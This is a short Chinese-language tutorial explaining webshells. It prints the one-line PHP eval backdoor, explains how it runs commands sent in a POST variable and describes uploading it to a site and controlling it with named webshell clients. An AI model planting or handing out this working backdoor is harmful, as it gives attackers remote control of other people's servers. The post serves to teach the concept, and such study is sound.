WebShell:什么是webshell?
- webshell即网页文件形式存在的一种代码执行环境,人话:网页后门,可以用来管理服务器。
WebShell的危害
关于webshell的原理和利用
<?php @eval($_POST['passwd']); ?>
- 让我们来分析一下这个webshell是怎么实现后门功能的。
“<?php ****** ?>”这是php的标记,不用理解
“@eval”是eval函数不报错的写法,eval函数用于将字符串当成命令执行,也就是说,它可以解析字符串用于执行PHP命令。如果我们上传一些高危代码让服务器执行,大部分服务器也就只能照做。
“$_POST[‘passwd’]”是上传一个名为passwd的变量,我们就可以修改passwd的值为一串命令,放在上面说的@eval里面,就可以执行“高危命令”
执行过程
系统接收变量中的危险代码
其中eval函数执行变量中的危险代码
实现get后门
本地服务器有文件上传系统。
现在生成一个名为webshell.php的文件,在里面写入刚才的内容。然后上传到网站,然后记下上传到的目录。
打开流行的软件,例如“中国菜刀”,“蚁剑”(软件github有),这些软件就是集成了命令,通过给你的“密码”(变量)赋值为命令来实现网站后门。
当然不要软件,手动来也行[doge]
然后我们就能自由控制网站了(咦[嘘声])
waf:你当我不存在???(所以才会有免杀的出现)
The End
|